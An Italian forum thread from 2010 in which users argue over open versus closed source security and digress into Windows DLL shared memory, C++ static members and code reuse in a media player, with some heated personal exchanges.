Se poi l'exception entry point è scritto in un codice ed il gestore delle syscall è scritto in un altro codice (es perché se ne occupavano "squadre" diverse) è facile che la compilazione sia "differita" e l'ambiguità non sia "saltata all'occhio".

Unrue
23-01-2010, 11:34
La filosofia open source non ha dimostrato proprio niente. Se sei al corrente di una dimostrazione formale, fammelo sapere che me la vado a leggete, ma per favore: non tirare fuori la famigerata "legge" di Linus che è soltanto una bufala. :p



Ma scusami, se un codice è sotto gli occhi di migliaia di persone, è molto più probabile trovare un bug e correggerlo. Se invece è sotto gli occhi di pochi sviluppatori, allora le probabilità diminuiscono. Questo non significa ovviamente che il codice open source sia perfetto, ma che la tempistica di correzione dei bug è potenzialmente molto più veloce. Se tu sviluppi un progetto ma tieni i codici tutti per te, solo tu puoi scovare i bug da codice e correggerli, se li condividi con altri, molte altre persone possono trovare un bug e segnalarlo.


Tanto per farti capire che non c'è nulla di "dimostrato", ti faccio un controesempio. Supponiamo che tu abbia due centrali nucleari nei pressi della residenza di George Bush jr. da collegare all'esterno. Supponiamo che entrambe facciano uso di un sistema open source, ma la prima espone tranquillamente il codice, mentre la seconda no, e come unica differenza rispetto alla prima abbia provveduto soltanto a offuscare le scritte che appaiono all'esterno (esempio: invece di Linux Debian 5.02, Apache 2.2, ecc. ecc. si presenti come NonSonoCazziTuoi 1.0 rock stable, NonSonoAncoraCazziTuoi 1.0 rock stable, ecc. e con tutte le altre scritte cambiate e ridotte all'osso).



Se è open source e non lo espone, non è open source.. :p

ConteZero
23-01-2010, 11:38
Ad oggi l'assenza di codici sorgenti ha un solo grande vantaggio... se rubi qualche tecnologia sotto patent e la implementi nel tuo codice in modo non visibile molto probabilmente non lo scoprirà mai nessuno.

trallallero
23-01-2010, 13:19
No, quello è un altro tipo di lock (lock su risorsa).

Quello di cui parlavamo è un lock software, utilizzato nel codice per arbitrare l'accesso a una struttura dati in memoria.
Intendi i mutex ?
Boh, non ho più seguito la discussione quindi non so come siate arrivati a parlare di lock e perchè ...

Quello che posso dire su Windows è che in ditta vige la regola, e questa và rispettata senza se e senza ma: "non usare membri statici in C++ altrimenti su Windows potrebbe non funzionare".
Boh, io programmo per Linux ed è anni che non faccio codice per Win quindi non sono aggiornato, ma per l'ultima gui QT che ho fatto e che deve girare sia su Linux che su Win, mi è stato esplicitamente chiesto di evitare qualsiasi variabile statica, singletone etc.
Mi è stato detto da gente che ha fatto in C++ per Windows la gestione audio e video della simulazione per l'esercito tedesco, non da 4 novelli (nello stesso progetto io sono stato responsabile della gestione della logica e della comunicazione che gira su Linux tranquillamente con singletones).
Ovviamente non ho problemi ad evitare variabili statiche essendoci n modi per ottenere lo stesso risultato, ma la cosa mi ha fatto pensare ...

AntonioBO
23-01-2010, 14:35
La fiera dei luoghi comuni.

Hai detto tu stesso che non hai competenze in materia, e continui a tirare fuori storie di s.o. che dovrebbero "sfiorare la perfezione" solo perché sarebbero a pagamento.

Non hai la minima idea di quel che sta dietro, fra teoria e pratica, alla scrittura del software, e ciononostante continui a parlare.

L'abbiamo capito che ti piace di più Linux perché è "gratis", "libero", e quello che vuoi tu, per quanto poco possano valere discorsi come questi che sono avulsi dal contesto e da una marea di considerazioni. E che Windows lo vedi come la peste perché "costa", è nelle mani del signore del male, ecc. ecc.

Adesso, cortesemente, potresti almeno riflettere sul "contributo" che stai dando alla discussione, e se non sia il caso di smettere di inquinare il thread con affermazioni che lasciano il tempo che trovano?

Grazie

Ovviamente io dico quello che voglio e non devo rendere conto a te per un beneamato cazzo di quello che penso. E soprattutto in una discussione che ho aperto io. Tu che contributo hai dato? Che Windows è il meglio del meglio? Cazzi tuoi che lo usi. E modera i toni !!! Non ho mai parlato nè di signore del male nè di altre cazzate al contrario di te!. Se pago qualcosa, non chiedo, MA PRETENDO che questa cosa funzioni e bene se no... che vada pure al diavolo . Che poi questa cosa che funziona poco bene venga imposta grazie a monopolio e ad un mercato non libero del software.. è un altro paio di maniche. Tienti i tuoi codici del piffero!!!

cdimauro
23-01-2010, 15:31
Tu non sei Microsoft...
Vero, ma ho espresso soltanto il mio giudizio.
quello che segue la progettazione dell'XBox 360 (specie sul versante sicurezza) è stato attentamente esaminato da ben più che un gruppo d'analisti di codice.
I documenti li ho letti, e a maggior ragione mi sono fatto quell'idea.
Per Microsoft PPC è un architettura nuova.
Direi di no, visto che IE e Office li ha sviluppati anche per Mac, quando questi ancora usavano i PPC e non gli x86.

Quindi da un po' di anni hanno gente con esperienza sui PPC, in particolare nella sezione compilatori (per il back-end che emette codice).
Basta che il compilatore, non abbastanza sveglio, riceva dal sorgente un dato a 32 bit.
Se poi l'exception entry point è scritto in un codice ed il gestore delle syscall è scritto in un altro codice (es perché se ne occupavano "squadre" diverse) è facile che la compilazione sia "differita" e l'ambiguità non sia "saltata all'occhio".
Non credo, proprio perché il dato che riceve la syscall è di un unico tipo: o è a 32 bit, o è a 64 bit.

Nell'esempio evidenziato che porta all'exploit, lo stesso registro viene usato prima a 32 bit, e poi a 64 bit.

Differenze così grossolane sono praticamente impossibili per un compilatore.
Ma scusami, se un codice è sotto gli occhi di migliaia di persone, è molto più probabile trovare un bug e correggerlo. Se invece è sotto gli occhi di pochi sviluppatori, allora le probabilità diminuiscono. Questo non significa ovviamente che il codice open source sia perfetto, ma che la tempistica di correzione dei bug è potenzialmente molto più veloce. Se tu sviluppi un progetto ma tieni i codici tutti per te, solo tu puoi scovare i bug da codice e correggerli, se li condividi con altri, molte altre persone possono trovare un bug e segnalarlo.
Questo perché presupponi che le persone che analizzano il codice abbia tutte le medesime skill, e soprattutto che i bug siano distribuiti in maniera abbastanza "omogenea". Inoltre che i bug richiedano tutti il medesimo impegno per il loro rilevamento.

Tutte ipotesi che non reggono. :fagiano:
Se è open source e non lo espone, non è open source.. :p
Appunto: possiamo considerarlo "closed", ma l'esempio che ho citato serve a 2 cose.

La prima a mostrare che il modello open source non è migliore di quello closed relativamente alla sicurezza (altro esempio: ho un sistema d'allarme eccezionale, e sono talmente convinto della sua sicurezza che attaccato alla porta lascio il suo schema completo per farlo esaminare dai ladri :D).
Ovviamente non significa che quello closed sia meglio.

La seconda è che la differenza fra closed e open è molto sottile, visto che entrambe le centrali nucleari alla fine utilizzano esattamente lo stesso codice (non tenendo conto dell'offuscamento delle scritte), e che il semplice non rilasciare i sorgenti cambi completamente lo scenario.
Ad oggi l'assenza di codici sorgenti ha un solo grande vantaggio... se rubi qualche tecnologia sotto patent e la implementi nel tuo codice in modo non visibile molto probabilmente non lo scoprirà mai nessuno.
Lo stesso si può dire dei bug, allora. ;)
Intendi i mutex ?
Boh, non ho più seguito la discussione quindi non so come siate arrivati a parlare di lock e perchè ...
Sì, i mutex fanno parte della famiglia.

I lock li ha citati ConteZero in un messaggio.
Quello che posso dire su Windows è che in ditta vige la regola, e questa và rispettata senza se e senza ma: "non usare membri statici in C++ altrimenti su Windows potrebbe non funzionare".
Boh, io programmo per Linux ed è anni che non faccio codice per Win quindi non sono aggiornato, ma per l'ultima gui QT che ho fatto e che deve girare sia su Linux che su Win, mi è stato esplicitamente chiesto di evitare qualsiasi variabile statica, singletone etc.
Mi è stato detto da gente che ha fatto in C++ per Windows la gestione audio e video della simulazione per l'esercito tedesco, non da 4 novelli (nello stesso progetto io sono stato responsabile della gestione della logica e della comunicazione che gira su Linux tranquillamente con singletones).
Ovviamente non ho problemi ad evitare variabili statiche essendoci n modi per ottenere lo stesso risultato, ma la cosa mi ha fatto pensare ...
Francamente non ho idea del perché non debbano essere usati. Dico: non mi capacito della motivazione tecnica che sta alla base di questa scelta.

Io non mi sono mai fatto problemi a utilizzare membri statici, quando m'è servito.

Passi per il pattern Singleton, che viene visto come il male da molti programmatori, ma per il resto i membri statici vengono utilizzati in maniera utile in alcuni pattern.
Ovviamente io dico quello che voglio e non devo rendere conto a te per un beneamato cazzo di quello che penso.
Laurea a Oxford immagino. :D
E soprattutto in una discussione che ho aperto io.
Questo non te ne dà automaticamente la proprietà.
Tu che contributo hai dato?
Lo puoi leggere nei miei messaggi precedenti.
Che Windows è il meglio del meglio?
Mai detto questo.
Cazzi tuoi che lo usi.
Ci mancherebbe che dovessi privarmi di uno strumento per questioni ideologiche e non tecniche.
E modera i toni !!!
Non confondere la critica, anche dura, con la mancanza di rispetto nei confronti dell'interlocutore.

Nel mio caso si applica la prima. Nel tuo la seconda.
Non ho mai parlato nè di signore del male nè di altre cazzate al contrario di te!.
Hai parlato di "software quasi perfetto". Adesso te lo rimangi?
Se pago qualcosa, non chiedo, MA PRETENDO che questa cosa funzioni e bene
Col software puoi metterti l'anima in pace: che tu abbia pagato o meno, è praticamente impossibile essere sicuri che sia esente da difetti.
se no... che vada pure al diavolo .
In tal caso non vedo perché ti lamenti: tanto tu mica lo compri, no?
Che poi questa cosa che funziona poco bene venga imposta grazie a monopolio e ad un mercato non libero del software.. è un altro paio di maniche.
Sì, e sono sicuramente le maniche sbagliate. Di chi nemmeno conosce la definizione di monopolio, e la usa riportando la classica leggenda metropolitana di MS brutta, cattiva, e monopolista, che impone Windows a tutti.
Tienti i tuoi codici del piffero!!!
Ma certamente. E tu tieniti le tue considerazioni che di tecnico non hanno nemmeno l'ombra, e che purtroppo elargisci erroneamente al mondo intero.

AntonioBO
23-01-2010, 15:48
Vero, ma ho espresso soltanto il mio giudizio.

I documenti li ho letti, e a maggior ragione mi sono fatto quell'idea.

Direi di no, visto che IE e Office li ha sviluppati anche per Mac, quando questi ancora usavano i PPC e non gli x86.

Quindi da un po' di anni hanno gente con esperienza sui PPC, in particolare nella sezione compilatori (per il back-end che emette codice).

Non credo, proprio perché il dato che riceve la syscall è di un unico tipo: o è a 32 bit, o è a 64 bit.

Nell'esempio evidenziato che porta all'exploit, lo stesso registro viene usato prima a 32 bit, e poi a 64 bit.

Differenze così grossolane sono praticamente impossibili per un compilatore.

Questo perché presupponi che le persone che analizzano il codice abbia tutte le medesime skill, e soprattutto che i bug siano distribuiti in maniera abbastanza "omogenea". Inoltre che i bug richiedano tutti il medesimo impegno per il loro rilevamento.

Tutte ipotesi che non reggono. :fagiano:

Appunto: possiamo considerarlo "closed", ma l'esempio che ho citato serve a 2 cose.

La prima a mostrare che il modello open source non è migliore di quello closed relativamente alla sicurezza (altro esempio: ho un sistema d'allarme eccezionale, e sono talmente convinto della sua sicurezza che attaccato alla porta lascio il suo schema completo per farlo esaminare dai ladri :D).
Ovviamente non significa che quello closed sia meglio.

La seconda è che la differenza fra closed e open è molto sottile, visto che entrambe le centrali nucleari alla fine utilizzano esattamente lo stesso codice (non tenendo conto dell'offuscamento delle scritte), e che il semplice non rilasciare i sorgenti cambi completamente lo scenario.

Lo stesso si può dire dei bug, allora. ;)

Sì, i mutex fanno parte della famiglia.

I lock li ha citati ConteZero in un messaggio.

Francamente non ho idea del perché non debbano essere usati. Dico: non mi capacito della motivazione tecnica che sta alla base di questa scelta.

Io non mi sono mai fatto problemi a utilizzare membri statici, quando m'è servito.

Passi per il pattern Singleton, che viene visto come il male da molti programmatori, ma per il resto i membri statici vengono utilizzati in maniera utile in alcuni pattern.

Laurea a Oxford immagino. :D

Questo non te ne dà automaticamente la proprietà.

Lo puoi leggere nei miei messaggi precedenti.

Mai detto questo.

Ci mancherebbe che dovessi privarmi di uno strumento per questioni ideologiche e non tecniche.

Non confondere la critica, anche dura, con la mancanza di rispetto nei confronti dell'interlocutore.

Nel mio caso si applica la prima. Nel tuo la seconda.

Hai parlato di "software quasi perfetto". Adesso te lo rimangi?

Col software puoi metterti l'anima in pace: che tu abbia pagato o meno, è praticamente impossibile essere sicuri che sia esente da difetti.

In tal caso non vedo perché ti lamenti: tanto tu mica lo compri, no?

Sì, e sono sicuramente le maniche sbagliate. Di chi nemmeno conosce la definizione di monopolio, e la usa riportando la classica leggenda metropolitana di MS brutta, cattiva, e monopolista, che impone Windows a tutti.

Ma certamente. E tu tieniti le tue considerazioni che di tecnico non hanno nemmeno l'ombra, e che purtroppo elargisci erroneamente al mondo intero.

Se volevo aprire un thread tecnico non lo aprivo qui in storia politica e attualità, ma nella sezione appropriata. Quindi se vuoi parlare di codici e altre amenità, sloggia e vai nella sezione adatta. E impara anche a leggere con attenzione quello che scrivo e quello che non scrivo!!!

cdimauro
23-01-2010, 15:54
Se volevo aprire un thread tecnico non lo aprivo qui in storia politica e attualità, ma nella sezione appropriata.
Che ha implicazioni tecniche.
Quindi se vuoi parlare di codici e altre amenità, sloggia e vai nella sezione adatta.
Lo faccio già.
E impara anche a leggere con attenzione quello che scrivo e quello che non scrivo!!!
Lo faccio già, e ti ho risposto di conseguenza.

trallallero
23-01-2010, 17:40
Francamente non ho idea del perché non debbano essere usati. Dico: non mi capacito della motivazione tecnica che sta alla base di questa scelta.

Io non mi sono mai fatto problemi a utilizzare membri statici, quando m'è servito.

Passi per il pattern Singleton, che viene visto come il male da molti programmatori, ma per il resto i membri statici vengono utilizzati in maniera utile in alcuni pattern.
Boh, ho dato per curiosità un'occhiata in rete e la MS spiega come implementare i singletons su Windows, quindi pare sia possibile.
Il problema che abbiamo avuto coi membri statici (e da quì i singletons) è uscito fuori quando dovevamo instanziare più applicazioni che usano la stessa libreria dll: i membri statici della libreria rimanevano statici per tutte le librerie aperte ovvero, se modificavi il valore di un membro statico da una libreria, tutte le librerie leggevano il medesimo valore. Ovviamente la cosa era rischiosissima per la mancanza di mutex sui membri statici con relativi crash delle applicazioni, ma ovviamente anche senza crash il risultato non era quello desiderato. Da li la regola ferrea in ditta di non usare membri statici ...
Comunque chiudo l'OT, non voglio continuare sul tecnico perchè vedo che state già litigando proprio per questo motivo :asd:

cdimauro
23-01-2010, 18:32
Ho capito il tuo problema, ma per le DLL il discorso è diverso. A parte il fatto che, per come lo hai descritto, mi sembra che il membro statico si comporti come da manuale, è possibile ricorrere ai mutex.

In ogni caso è anche possibile, se non ricordo male, avere memoria non condivisa (quindi "locale") nelle DLL per tutte le applicazioni che ne fanno uso.

Chiudo qui anch'io, che siamo andati un po' troppo OT. :D

trallallero
23-01-2010, 19:38
Ho capito il tuo problema, ma per le DLL il discorso è diverso. A parte il fatto che, per come lo hai descritto, mi sembra che il membro statico si comporti come da manuale, è possibile ricorrere ai mutex.
Beh direi proprio di no, a meno che la MS abbia i suoi manuali personalizzati.
La memoria è condivisa tra l'applicazione e la libreria, non tra le applicazioni e le librerie anche se queste si chiamano allo stesso modo.
X.exe utilizza Y.dll ma non dovrebbe avere niente a che fare con Z.exe che utilizza Y.dll.

cdimauro
23-01-2010, 19:46
Uomo di poca fede: Using Shared Memory in a Dynamic-Link Library (http://msdn.microsoft.com/en-us/library/ms686958(VS.85).aspx) :cool:

ConteZero
23-01-2010, 19:46
Ho abbandonato perché i post sono diventati troppo lunghi da leggere.
Ci tenevo solo a dire che i bug oramai vengono spesso usati per riconoscere una violazione di copyright :eek:
Ne sanno qualcosa quelli del Popcornhour, che hanno visto "smascherato" il loro media player come un implementazione "non free" di MPlayer proprio perché con determinati tipi di filmato c'erano dei difetti tipici di alcuni bug presenti (e mai risolti in quanto "poco importanti") nell'mplayer.

trallallero
23-01-2010, 20:37
Uomo di poca fede: Using Shared Memory in a Dynamic-Link Library (http://msdn.microsoft.com/en-us/library/ms686958(VS.85).aspx) :cool:

Che questo sia possibile mi sembra buono, che sia il comportamento di default non tanto ...
Comunque sicuramente è possibile ma con la MS bisogna fare a modo suo e probabilmente questo modo non lo conosciamo. Quello che mi sembra strano è che ci sia ancora questa regola in ditta nonostante la presenza di esperti Windows (oddio, la nostra parte, gruppo communicazione, ha passato il test mentre la loro ... ehm ... :asd: progetto rinviato di 6 mesi per colpa loro, forse quell'"esperti" va un pò rivalutato :D)

cdimauro
23-01-2010, 21:34
Che questo sia possibile mi sembra buono, che sia il comportamento di default non tanto ...
Mumble. E perché? Per me è giusto che, di default, una DLL utilizzi lo spazio d'indirizzamento dell'applicazione che la usa.

In questo modo vengono completamente isolate le applicazioni, e la DLL usata soltanto per usufruire delle API che si porta dietro. Il vantaggio ulteriore è che il sistema è molto più stabile e sicuro.
Comunque sicuramente è possibile ma con la MS bisogna fare a modo suo e probabilmente questo modo non lo conosciamo.
Mi sembra anche normale: una DLL non è una shared library dei sistemi Unix.

Ogni s.o. ha le proprie peculiarità, che andrebbero conosciute e sfruttate.
Quello che mi sembra strano è che ci sia ancora questa regola in ditta nonostante la presenza di esperti Windows (oddio, la nostra parte, gruppo communicazione, ha passato il test mentre la loro ... ehm ... :asd: progetto rinviato di 6 mesi per colpa loro, forse quell'"esperti" va un pò rivalutato :D)
"Tu l'hai detto". :O

Anche perché, oggettivamente, se hai studiato il funzionamento delle DLL, son tutte cose che dovresti sapere (non dico a te, ma parlo degli "esperti").
Io quel link te l'ho recuperato in 2 secondi netti, ma perché sapevo già cosa cercare: ero sicurissimo che si poteva condividere memoria fra le DLL, perché anni fa qualcosina l'avevo studiata sull'argomento.

ConteZero
23-01-2010, 21:38
Anche perché, oggettivamente, se hai studiato il funzionamento delle DLL, son tutte cose che dovresti sapere (non dico a te, ma parlo degli "esperti").
Io quel link te l'ho recuperato in 2 secondi netti, ma perché sapevo già cosa cercare: ero sicurissimo che si poteva condividere memoria fra le DLL, perché anni fa qualcosina l'avevo studiata sull'argomento.

Mi sono appena beccato una sassata in faccia :asd:
Perché fare una cosa così orribile come condividere la memoria fra diverse "istanze" della stessa DLL ?
Se c'è da gestire una risorsa non preemptable bisognerebbe usare un manager o qualcosa del genere... brrr, che brutta cosa che hai detto :asd:

cdimauro
23-01-2010, 21:42
Dipende dalle esigenze. Se serve condividerla, i mezzi ci sono, e sono meglio che niente.

Comunque, onestamente non m'è mai capitato. Si vede che sono fortunato, e le sassate per ora me le sono risparmiate. :asd:

gugoXX
23-01-2010, 22:20
Il codice di una DLL viene caricato una volta sola, anche se usata piu' volte da piu' programmi.
In questo senso la memoria e' condivisa. L'indirizzo fisico e' uguale, sono diversi gli indirizzi virtuali.
Ma immagino non steste parlando della memoria codice ma bensi' quella dato.

Comunque si'. Mi pare un po' off-topic.

Peraltro ultimamente ho dovuto installare Chrome perche' firefox e' affetto da rallentamenti senza senso. Si blocca e riparte all'improvviso. (Ho antivirus, ad-aware e compagnia danzante)

trallallero
23-01-2010, 22:52
@cdimauro:
Probabilmente parlo arabo allora perchè noi NON volevamo condividere memoria fra le DLL come ci si aspetta che faccia una dynamic link library caricata da un eseguibile.
Se vuoi che le applicazioni possano comunicare utilizzi shm (come facciamo noi), ipc o quello che vuoi, ma non certo mettendo di default la libreria condivisa.
A parte che non mi sembra il caso della MS perchè dal tuo link ho capito che lo devi specificare se vuoi condivisione, ma magari questa è una feature nuova. Perchè il nostro problema risale a 3 anni fa.

E comunque vedo che hai preso la palla al balzo :nonsifa:
gli "esperti" li ho canzonati, è vero, ma sono comunque 3 ragazzi che hanno messo su una simulazione da paura (immagina 2 carroarmati virtuali che hanno una visione 3d dello scenario grazie ai proiettori - da gestire via software -, con tanto di specchietti retrovisori - un monitor per ogni specchietto da gestire via software - qualche finestrino - un monitor per ogni finestrino da gestire via software - aerei che passano - gestire l'audio, etc ...).

ConteZero
23-01-2010, 23:04
Il codice di una DLL viene caricato una volta sola, anche se usata piu' volte da piu' programmi.
In questo senso la memoria e' condivisa. L'indirizzo fisico e' uguale, sono diversi gli indirizzi virtuali.
Ma immagino non steste parlando della memoria codice ma bensi' quella dato.

Comunque si'. Mi pare un po' off-topic.

Peraltro ultimamente ho dovuto installare Chrome perche' firefox e' affetto da rallentamenti senza senso. Si blocca e riparte all'improvviso. (Ho antivirus, ad-aware e compagnia danzante)

Si, il codice della libreria viene caricata una volta sulla memoria fisica, dopodiché le pagine che la contengono vengono mappate nello spazio d'indirizzamento dei progammi che la richiedono (che quindi possono accedere alle funzioni offerte tramite delle normalissime CALL).
Il punto è... perché una DLL dovrebbe avere un area dati SUA condivisa fra tutte le istanze ?
Una ragione plausibile è per gestire una risorsa non preemptable, ad esempio (beh, è un esempio) un driver stampante... ma a quel punto è più pratico usare un manager e mettere nella DLL solo l'interfaccia di comunicazione col manager stesso.
Ad occhio e croce sembra l'equivalente delle librerie dinamiche di linux + shm...

cdimauro
24-01-2010, 06:02
@cdimauro:
Probabilmente parlo arabo allora perchè noi NON volevamo condividere memoria fra le DLL come ci si aspetta che faccia una dynamic link library caricata da un eseguibile.
Se vuoi che le applicazioni possano comunicare utilizzi shm (come facciamo noi), ipc o quello che vuoi, ma non certo mettendo di default la libreria condivisa.
A parte che non mi sembra il caso della MS perchè dal tuo link ho capito che lo devi specificare se vuoi condivisione, ma magari questa è una feature nuova. Perchè il nostro problema risale a 3 anni fa.
No, è cosa abbastanza vecchia.
E comunque vedo che hai preso la palla al balzo :nonsifa:
gli "esperti" li ho canzonati, è vero, ma sono comunque 3 ragazzi che hanno messo su una simulazione da paura (immagina 2 carroarmati virtuali che hanno una visione 3d dello scenario grazie ai proiettori - da gestire via software -, con tanto di specchietti retrovisori - un monitor per ogni specchietto da gestire via software - qualche finestrino - un monitor per ogni finestrino da gestire via software - aerei che passano - gestire l'audio, etc ...).
E però tu li chiami esperti, ma non sanno come funzionano le DLL... permettimi di bacchettarli.

Sul loro lavoro nulla da dire, ma non era questo in discussione, quanto le loro affermazioni sul funzionamento delle DLL. :read:

trallallero
24-01-2010, 09:46
Sul loro lavoro nulla da dire, ma non era questo in discussione, quanto le loro affermazioni sul funzionamento delle DLL. :read:

Ok, domani lo chiedo direttamente con loro (gli "esperti").